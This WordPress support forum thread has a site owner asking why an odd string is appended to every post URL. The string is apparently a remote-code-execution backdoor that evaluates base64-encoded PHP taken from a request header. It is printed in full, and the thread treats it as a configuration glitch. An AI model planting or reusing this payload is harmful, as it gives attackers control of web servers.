WordPress.org

Ready to get started?Download WordPress

Forums

Help! WordPress appending code to URLs, confusing servers (4 posts)

  1. nicov
    Member
    Posted 4 years ago #

    We just had a problem with plugins and I had some trouble with Super Cache, evidently, in particular.

    After we sorted all that out, we're left with a new problem: WordPress is now appending this code to all URLs: %&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%7D%7D|.+)&%/

    This means that anyone who clicks the title of a post, or a "continue reading" tag will be taken to the post's url + that stuff, and they don't get the actual page (which still exists, at the proper URL).

    For example, here's our homepage: http://chamberfour.com/ If you click on the title of the first post you get this url: http://chamberfour.com/2009/08/31/review-last-exit-to-brooklyn/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%7D%7D|.+)&%/

    But the post actually exists at this url: http://chamberfour.com/2009/08/31/review-last-exit-to-brooklyn/

    This is showing up in the admin area, too. It feels like there's a missing quote somewhere, and something that should be invisible is getting inserted into the URL.

    I'm not a coder though, so I can't figure out what got messed up or how to change it.

    Any help or advice would be greatly appreciated.

  2. ClaytonJames
    Member
    Posted 4 years ago #

    Here is a post with a very similar problem with what seems to be a quick solution. Perhaps it might be worth a look.

    http://wordpress.org/support/topic/257207?replies=2

    However, there are other similar issues that merit investigation as well. Perhaps there is more than one thing going on.

  3. nicov
    Member
    Posted 4 years ago #

    You're a lifesaver, that's exactly what it was.

  4. ClaytonJames
    Member
    Posted 4 years ago #

    Glad it helped!

Topic Closed

This topic has been closed to new replies.

About this Topic

Tags

No tags yet.